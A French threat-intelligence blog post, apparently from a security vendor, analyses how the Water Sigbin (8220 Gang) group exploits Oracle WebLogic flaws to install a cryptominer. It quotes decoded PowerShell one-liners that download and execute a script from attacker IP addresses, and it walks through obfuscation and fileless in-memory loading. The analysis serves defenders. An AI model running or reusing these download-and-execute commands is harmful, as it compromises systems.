Le contenu a été ajouté à votre Folio
Accédez à Folio (0)
APT et attaques ciblées
Water Sigbin (alias 8220 Gang) a exploité les vulnérabilités d’Oracle WebLogic pour déployer un mineur de cryptomonnaie à l’aide d’un script PowerShell. L’acteur menaçant a également adopté de nouvelles techniques pour dissimuler ses activités, rendant ainsi les attaques plus difficiles à contrer.
Par : Sunil Bharti
Temps de lecture: ( mots)
- Water Sigbin a exploité les vulnérabilités CVE-2017-3506 et CVE-2023-21839 pour déployer un mineur de cryptomonnaie via un script PowerShell.
- Le gang a utilisé des techniques d’obscurcissement, telles que le codage hexadécimal des URL et l’utilisation de HTTP sur le port 443, permettant une livraison furtive des charges utiles.
- Le script PowerShell et le fichier de commandes résultant impliquaient un codage complexe, utilisant des variables d’environnement pour masquer le code malveillant dans des composants de script apparemment inoffensifs.
- Le groupe a effectué une exécution sans fichier en utilisant des techniques de réflexion .NET dans les scripts PowerShell, ce qui permet au code malveillant de s’exécuter uniquement en mémoire, évitant ainsi les mécanismes de détection basés sur le disque.
- L’évolution continue des outils, tactiques et procédures (TTP) des acteurs malveillants souligne la nécessité pour les organisations de rester vigilantes et d’adopter diverses bonnes pratiques en matière de cybersécurité, comme la gestion régulière des correctifs, la formation des employés et les plans de réponse aux incidents.
Water Sigbin (alias 8220 Gang) est un acteur malveillant basé en Chine, actif depuis au moins 2017. Il se concentre sur le déploiement de logiciels malveillants d’extraction de cryptomonnaie, principalement dans des environnements cloud et des serveurs Linux. Le groupe est connu pour intégrer l’exploitation des vulnérabilités dans son large éventail de TTP.
Nous avons trouvé l’acteur malveillant exploitant les vulnérabilités du serveur Oracle WebLogic. CVE-2017-3506 (une vulnérabilité permettant l’exécution de commandes du système d’exploitation à distance) et CVE-2023-21839 (une vulnérabilité de désérialisation non sécurisée) pour déployer un mineur de cryptomonnaie via un script PowerShell nommé bin.ps1 sur l’hôte victime. Après un examen plus approfondi des outils, tactiques et procédures (TTP) du groupe, nous avons déterminé que l’exploitation était l’œuvre de Water Sigbin, indiquant qu’il met continuellement à jour ses scripts et outils de déploiement.
Nous avons observé la charge utile d’attaque suivante pour CVE-2017-3506 :
La chaîne codée en base64 dans la charge utile de l’attaque est la suivante :
PowerShell “IEX (New-Object Net.WebClient). DownloadString (‘http://0xb9ac8092:443/bin.ps1’)”
Pendant ce temps, la charge utile de l’attaque pour CVE-2023-21839 est visible dans la figure 2.
Pour cet exploit, la chaîne codée en base64 dans la charge utile d’attaque est :
powershell “IEX (New-Object Net.WebClient). DownloadString (‘http://185.172.128.146:443/bin.ps1’)”
Nous avons détecté des tentatives d’exploitation sur des machines Linux et Windows, l’auteur de la menace déployant des scripts shell sur le premier et un script PowerShell sur le second. Pour notre analyse, nous nous référerons aux techniques utilisées dans la version Windows de l’exploitation, qui montre une technique d’obscurcissement remarquable utilisée par Water Sigbin.
Au début de la livraison de la charge utile lors de l’exploitation de la vulnérabilité, l’auteur de la menace a utilisé les techniques suivantes pour échapper à la détection :
- Implémentation du codage hexadécimal pour les URL :
L’URL utilisée pour télécharger et déployer le script PowerShell est illustrée dans l’image suivante :
La notation décimale à points de cette URL se traduit par http://187.172.128.146:443/bin[.]ps1
- Utilisation de HTTP sur le port 443 :
Le bin.ps1 Le fichier de script shell se compose de deux parties :
- Une longue chaîne codée en base64 contenant le code binaire et les instructions pour l’exécuter
- Une fonction chargée de décoder la chaîne base64, en écrivant le contenu décodé dans un fichier nommé microsoft_office365.bat dans le répertoire temporaire et en l’exécutant silencieusement
Le contenu encodé en base64 décodé par le Convert-Base64ToFileAndExecuteSilently fonctionner dans le bin.ps1 Le fichier révèle les éléments de base du script. Ce contenu décodé est ensuite écrit dans le répertoire temporaire sous le nom de fichier microsoft_office365.bat.
Analyse de microsoft_office365.bat
Le microsoft_office365.bat Le script utilise des variables d’environnement pour masquer le code du script d’origine, le rendant complexe et déroutant. Le script commence par le code suivant :
En examinant le script, nous avons observé qu’il semble que des variables d’environnement soient définies, ce qui semble être des données illisibles ou charabia. Cependant, après une analyse approfondie, il semble que les auteurs de la menace aient réussi à mettre en œuvre une méthode très efficace pour cacher leur code malveillant.
Pour obtenir le code réel, nous devons décoder la première condition « if » :
Ensuite, nous devons remplacer RxEGj avec vide (« ») dans chaque partie du code. Après cela, la première partie du script ressemblera à ceci :
La commande initiale cmd /c “set __=&rem” exécute une nouvelle invite de commande et définit la variable d’environnement « __ » sur une chaîne vide, puis exécute le Rem (enregistre les commentaires dans un fichier batch), qui ne fait rien. Dans l’ensemble, la section de script semble être conçue pour démarrer une nouvelle fenêtre d’invite de commande en mode réduit, puis quitter le script actuel.
Les deux longues lignes suivantes de contenu codé en base64 contiennent le code binaire réel, nécessitant un traitement avant de pouvoir être utilisé. L’attaquant utilise des méthodes PowerShell pour ce traitement.
La section suivante contient du code PowerShell obscurci, qui effectue tout le traitement sur la chaîne codée en base64 pour une utilisation ultérieure.
De même, si nous désobscurcissons la section restante en remplaçant RxEGj avec une chaîne vide (“”), nous obtiendrons le code PowerShell réel :
Cette commande PowerShell effectue les actions suivantes :
- Décode la chaîne base64 ([Convert]::DeBase64String)
- Effectue le décryptage ([System.Security.Cryptography.Aes]) de la très longue corde
- Décompresse la chaîne déchiffrée ([IO.Compression.CompressionMode])
- Exécute le code du malware à l’aide de DotNet dans la réflexion de la mémoire ([System.Reflection.Assembly])
En exploitant « System.Reflection.Assembly », l’attaquant orchestre une stratégie d’exécution sans fichier, garantissant que toutes les opérations se produisent uniquement en mémoire.
Les activités de Water Sigbin impliquant l’exploitation des CVE-2017-3506 et CVE-2023-21839 soulignent l’adaptabilité des acteurs de la menace moderne. L’utilisation de techniques d’obfuscation sophistiquées telles que le codage hexadécimal des URL, l’encodage complexe dans PowerShell et les scripts batch, l’utilisation de variables d’environnement et l’obscurcissement en couches pour dissimuler le code malveillant dans des scripts apparemment inoffensifs démontrent que Water Sigbin est un acteur menaçant capable de cacher ses menaces. pistes, ce qui rend la détection et la prévention plus difficiles pour les équipes de sécurité.
Ces tactiques évolutives nécessitent une vigilance constante et des contre-mesures proactives pour protéger les systèmes et les réseaux contre les menaces sophistiquées.
Pour protéger efficacement les systèmes et les réseaux contre l’exploitation des vulnérabilités telles que celles réalisées par le Water Sigbin, les organisations peuvent mettre en œuvre diverses bonnes pratiques de cybersécurité et mesures de défense proactives. Voici quelques recommandations :
- Gestion des correctifs. Donnez la priorité aux mises à jour régulières et aux processus de gestion des correctifs pour garantir que tous les systèmes exécutent les dernières versions logicielles. Appliquez rapidement des correctifs de sécurité pour les vulnérabilités connues, en particulier celles dont les exploits sont accessibles au public.
- Segmentation du réseau. Utilisez la segmentation du réseau pour réduire la surface d’attaque. En séparant les segments de réseau critiques du réseau plus vaste, l’impact d’une exploitation potentielle de vulnérabilité peut être minimisé,
- Audits de sécurité réguliers. Réalisez régulièrement des audits de sécurité et des évaluations de vulnérabilité pour identifier et corriger les faiblesses potentielles de l’infrastructure avant qu’elles ne puissent être exploitées.
- Formation de sensibilisation à la sécurité. Éduquez les employés sur les tactiques courantes utilisées par les attaquants afin qu’ils puissent reconnaître et éviter d’être victimes d’attaques d’ingénierie sociale qui pourraient précéder l’exploitation des vulnérabilités.
- Plan de réponse aux incidents. Développez, testez et maintenez un plan de réponse aux incidents afin que votre organisation puisse répondre rapidement et efficacement à toute faille de sécurité ou exploitation de vulnérabilités.
- Renseignements sur les menaces. Abonnez-vous aux flux de renseignements sur les menaces pour rester informé des dernières menaces et tactiques utilisées par les auteurs de menaces et les groupes de menaces persistantes avancées (APT).
Les protections suivantes existent pour détecter les activités malveillantes et protéger les clients Trend contre l’exploitation des vulnérabilités évoquées dans cet article de blog :
- 1011716 – Vulnérabilité de désérialisation non sécurisée du serveur Oracle Weblogic (CVE-2023-21839)
- 1010550 – Vulnérabilité d’exécution de code à distance du composant de sécurité Oracle WebLogic WLS (CVE-2017-3506)
Les indicateurs de compromission pour cette entrée peuvent être trouvés ici.
ATTAQUE À ONGLET&CK
Tactique | Technique | Identifiant technique |
---|---|---|
Accès initial | Exploiter une application destinée au public | T1190 |
Exécution | Interpréteur de commandes et de scripts : PowerShell | T1059.001 |
Évasion de la défense | Désobscurcir/décoder des fichiers ou des informations | T1140 |
Fichiers ou informations obscurcis : obscurcissement des commandes | T1027.010 | |
Masquer les artefacts : fenêtre cachée | T1564.003 | |
Injection de processus : injection exécutable portable | T1055.002 | |
Chargement du code réfléchissant | T1620 | |
Commander et contrôler | Encodage des données : encodage standard | T1132.001 |
Protocole de couche application : protocoles Web | T1071.001 | |
Transfert d’outil d’entrée | T1105 |
Mots clés
sXpIBdPeKzI9PC2p0SWMpUSM2NSxWzPyXTMLlbXmYa0R20xk